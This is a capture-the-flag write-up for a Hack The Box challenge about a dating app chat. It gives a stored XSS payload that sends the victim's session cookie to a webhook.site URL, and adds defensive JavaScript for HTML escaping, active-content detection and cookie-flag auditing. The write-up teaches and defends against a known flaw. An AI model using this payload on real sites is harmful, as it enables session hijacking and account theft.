https://app.hackthebox.com/challenges/860

Description

Dating and matching can be exciting especially during Valentine’s, but it’s important to stay vigilant for impostors. Can you help identify possible frauds?

Exploitation

Register and log in, then navigate to Matches to start a conversation.

Begin the conversation with:

Hello, how are you?

Set up a webhook by obtaining a URL from https://webhook.site/, then replace the placeholder ID in the payload below with your unique one.

Demonstrate the XSS by sending:

Hello there `<script>document.location='https://webhook.site/YOUR-UNIQUE-ID?c='+document.cookie</script>`

Finally, paste the captured cookie into the designated page and refresh it.
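The chain above works only because two things hold at once: the chat renders a message as HTML instead of text, and the session cookie is readable from script. The following JavaScript is an added example written for this write-up, not code from the challenge; it shows the two checks a defender would apply. The message text is a constructed sample in the shape of the payload above (with a placeholder host), and the Set-Cookie headers are constructed too.

```javascript
// Added example, not part of the original write-up or the challenge code.
// Two defensive checks against the stored-XSS-to-cookie-theft path:
//   1. render chat messages as text (entity-encode) instead of raw HTML;
//   2. audit the session cookie for HttpOnly/Secure/SameSite.

// Entity-encode the characters that change meaning in an HTML text context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// A safe renderer: author and message both go through escapeHtml before
// being placed in markup, so a <script> tag arrives as literal text.
function renderMessage(author, text) {
  return `<div class="msg"><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</div>`;
}

// Heuristic used here to check rendered output: does the fragment still
// contain a live script tag, an inline event handler, or a javascript: URL?
const ACTIVE_CONTENT_RE = /<script\b|\bon[a-z]+\s*=|javascript:/i;
function containsActiveContent(html) {
  return ACTIVE_CONTENT_RE.test(html);
}

// Parse one Set-Cookie header and report the attributes that matter here.
// HttpOnly is what keeps document.cookie from exposing the session value.
function auditSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim());
  const name = parts[0].split('=')[0];
  const attrs = parts.slice(1).map((p) => p.toLowerCase());
  const sameSite = attrs.find((a) => a.startsWith('samesite='));
  return {
    name,
    httpOnly: attrs.includes('httponly'),
    secure: attrs.includes('secure'),
    sameSite: sameSite ? sameSite.split('=')[1] : 'unset',
  };
}

// Constructed sample message: the payload shape from the write-up with a
// placeholder host instead of a real webhook ID.
const SAMPLE_MSG =
  "Hello there <script>document.location='https://example.invalid/?c='+document.cookie</script>";

// Constructed sample headers: the weak form and a hardened form.
const WEAK_COOKIE = 'session=abc123; Path=/';
const HARDENED_COOKIE = 'session=abc123; Path=/; HttpOnly; Secure; SameSite=Lax';

// Stand-alone run: raw message is live, rendered message is inert.
console.log('raw message active:', containsActiveContent(SAMPLE_MSG));
console.log('rendered message active:', containsActiveContent(renderMessage('match', SAMPLE_MSG)));
console.log('weak cookie:', auditSetCookie(WEAK_COOKIE));
console.log('hardened cookie:', auditSetCookie(HARDENED_COOKIE));
```

Run it with node. Escaping on output is the fix for the injection itself; the cookie audit is the second layer, because with HttpOnly set the payload's `document.cookie` read returns nothing useful even if an injection slips through.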

Summary

OnlyHacks: a chat message is rendered as HTML rather than text, so a cross-site scripting payload can send a cookie to a webhook; pasting that captured cookie into the designated page recovers the flag.